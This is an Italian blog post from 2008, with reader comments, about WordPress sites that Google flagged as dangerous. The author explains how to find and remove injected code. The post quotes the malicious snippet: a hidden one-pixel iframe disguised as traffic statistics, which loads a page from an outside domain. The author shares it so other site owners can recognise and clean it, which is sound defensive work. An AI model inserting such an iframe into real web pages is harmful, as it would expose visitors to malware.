Home » Wordpress » Malware su WordPress

Malware su WordPress

Pubblicato il 22 Febbraio 2008 alle 01:14 pm | Archiviato in Wordpress 

Cercando, tramite il campo di ricerca di Google, la posizione e l’indicizzazione di due miei blog, ho scoperto una triste sorpresa. Google aveva inserito sotto al title la seguente scritta: Questo sito potrebbe arrecare danni al tuo computer.

Inutile dire il danno che si ha con una frase del genere nelle serp… Le visite di uno dei due blog (l’altro è in costruzione) sono, ovviamente, diminuite drasticamente.

Cliccando su quella scritta si viene reindirizzati ad una delle pagine della Guida di Google, che spiega che i siti che presentano quella scritta possono contenere dei malware, dei file dannosi per il computer.

Inizialmente, preso dal panico, ho controllato tutte le cartelle nel server, per scovare eventuali file sospetti, ma non ho trovato nulla.

Ho richiesto un controllo a Google, seguendo il link a fondo di quella pagina, che diceva appunto: Se sei l’amministratore di un sito identificato dal nostro messaggio di avviso, consulta le istruzioni disponibili nel nostro Centro assistenza webmaster.

Da lì sono andato sulla pagina degli Strumenti per i webmaster di Google. In questa pagina è possibile inserire i propri siti ed avere così a disposizione una serie di strumenti, come la diagnostica, le statistiche, ecc. Sull’Introduzione così ho letto: Questo sito potrebbe diffondere badware, come stabilito dalle linee guida di StopBadware.org per i siti web. Chi effettua ricerche su Google visualizzerà una pagina di avviso quando tenterà di accedere a queste pagine del sito contrassegnate come contenenti badware.
Ho quindi cliccato su Richiedi un controllo. Ma niente, Google continuava va trovare quel file dannoso…

E’ successa nel frattempo la stessa cosa su Casa Spam, il blog contro lo spam che gestiamo io e Pieru. Ho quindi avvisato il mio amico che ha pensato bene, a differenza di me…, di controllare il codice sorgente della home page, trovando questo codice sospetto:

<!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://www.wp-stats-php.info/iframe/wp-stats.php"></iframe> <!-- End Traffic Statistics --> all’interno di un post…

Se a voi è successa o succederà la stessa cosa, controllate il codice sorgente delle pagine incriminate. Google vi segnala un elenco, anche via email, delle pagine che contengono quel codice. Essendo un blog, quel codice non solo era presente sulla pagina dell’articolo, ma anche sulla home, su quella degli archivi e su quella della categoria di riferimento.

E’ bastato aprire il post e cancellare quel codice. Quindi abbiamo richiesto un controllo a Google, che visionerà il sito, lo troverà pulito e toglierà quella scritta dalle serp.

Resta da appurare, ora, come l’hacker di turno abbia potuto inserire quel codice nel post…

Opzioni articolo
Permalink | Trackback | | Stampa l'articolo | 11 commenti


Commenti

Attenzione: nessun commento sarà approvato se l'email risulterà falsa.

11 commenti a “Malware su WordPress”

  1. marco il 24 Febbraio 2008 11:43

    quella pagina interstiziale è disastrosa! … anche a me accade una cosa simile, anchi’io chiesi il riesame e la pagina interstiziale fu tolta, ma nel frattempo erano trascorsi 40 giorni !!

    personalmente penso che google dovrebbe fare quello per cui è stato creato, IL MOTORE DI RICERCA, nulla di più nulla di meno!

    il poliziotto, giudice e boia lo lasci fare a chi è proposto a quelle mansioni.

  2. Daniele Imperi il 1 Marzo 2008 12:31

    A me l’hanno tolta in 4-5 giorni.

  3. giuseppe il 30 Aprile 2008 12:39

    anche a me appaiono ma siccome non possiedo siti web non ho nulla da temere dato che non li apro mai questi siti dannosi.

  4. kit il 7 Maggio 2008 20:39

    Ho seguito i tuoi consigli e sono riuscito a risolvere il problema. A me l’interstitial l’hanno già tolto… posso ritenermi fortunato allora?

  5. Daniele Imperi il 8 Maggio 2008 07:42

    Sì, ma controlla periodicamente il tuo sito, io sono stato attaccato per 3 volte sugli stessi…

  6. Allarme rosso nelle serp il 31 Luglio 2008 10:39

    [...] fa avevo scritto un articolo in proposito, riguardo ai malware che si annidavano nei blog creati con WordPress e creato una discussione nel forum sui Motori di [...]

  7. Walter il 10 Novembre 2008 10:56

    Grazie, ragazzi ma purtroppo il problema non è risolto al 100%

    Ho trovato più di un post “modificato” con quella stringa che avete individuato. L’ho rimossa ed il mio blog è stato riabilitato da google ma ora il problema è come NON farlo risuccedere… L’ho pulito più volte il mio blog ma dopo pochi giorni qualcuno torna dentro e mi crea nuovi problemi. Secondo voi come posso mettere in sucurezza il mio sito da questo tipo di problemi?

    Grazie.
    Walter

  8. Daniele Imperi il 10 Novembre 2008 11:23

    Ciao Walter, innanzitutto hai aggiornato all’ultima versione WP?

  9. Walter il 10 Novembre 2008 16:35

    no non credo… è una operazione che posso fare da pannello di controllo del blog? quasi 2 anni fa sono uscito dal circuito wordpress per installare il blog su un hosting esterno. Credi che il fatto che il mio blog venga continuamente “bucato” possa essere un problema di sicurezza di chi mi offre lo spazio web?

  10. Daniele Imperi il 10 Novembre 2008 17:13

    Intanto aggiorna alla verisone 2.6.3.

    No, purtroppo non è detto che sia colpa dell’hosting.

    Leggin questa discussione: http://www.tutti-per-uno.org/cms/3835-wordpress-2-6-e-seguenti-vulnerabile.html

    e questa: http://www.tutti-per-uno.org/consigli/3843-hosting-e-dominio-2.html

  11. kit vs google | La bottega di kit il 9 Luglio 2009 10:22

    [...] ad un sito criminoso. Se, non ve lo auguro, capiterà anche a voi date un’occhiata al post Malware su Wordpress. Il codice è proprio quello segnalato da Daniele Imperi nel suo post. Posso dire con orgoglio [...]

Lascia un commento